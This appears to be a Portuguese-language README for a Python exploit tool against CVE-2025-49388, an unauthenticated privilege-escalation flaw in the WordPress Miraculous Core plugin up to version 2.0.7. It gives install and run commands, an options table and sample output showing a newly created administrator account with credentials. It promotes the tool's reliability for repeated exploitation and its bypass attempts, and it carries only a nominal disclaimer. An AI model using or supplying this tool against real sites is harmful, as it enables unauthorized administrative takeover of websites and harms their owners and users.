
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Escalação de Privilégios sem Autenticação
O plugin Miraculous Core Plugin do WordPress <= 2.0.7 é vulnerável a Escalonamento de Privilégios
A vulnerabilidade Atribuição Incorreta de Privilégios no Miraculous Core Plugin do kamleshyadav permite que atacantes não autenticados escalonem privilégios e registrem contas de administrador.
Versões afetadas: n/a até 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (Avaliação ainda não fornecida)
Este script Python automatiza a exploração da CVE-2025-49388 registrando uma nova conta de administrador em instâncias WordPress vulneráveis com o plugin Miraculous Core instalado.
Ele oferece alta confiabilidade, randomiza dados para exploração repetida e confiável, e lida automaticamente com cabeçalhos, cookies e tentativas de bypass.
Instalar dependências:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
Exemplo:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
Nota:
Se você omitir nome de usuário ou e-mail, valores aleatórios serão gerados para cada execução para evitar erros de duplicidade.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.
A exploração não autorizada de sistemas sem permissão explícita é ilegal e antiética.
O autor não se responsabiliza por uso indevido ou danos. Use com responsabilidade.
| Option | Descrição | Exemplo |
|---|
-u, --url | URL alvo do WordPress (obrigatório) | -u http://target.com/wordpress |
-un, --username | Nome de usuário desejado (padrão: aleatório) | -un admin1337 |
-fn, --full_name | Nome completo (padrão: Nxploited) | -fn "John Doe" |
-em, --useremail | E-mail (padrão: aleatório) | -em [email protected] |
-pw, --password | Senha (padrão: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | Registrar resultados em arquivo | -o result.txt |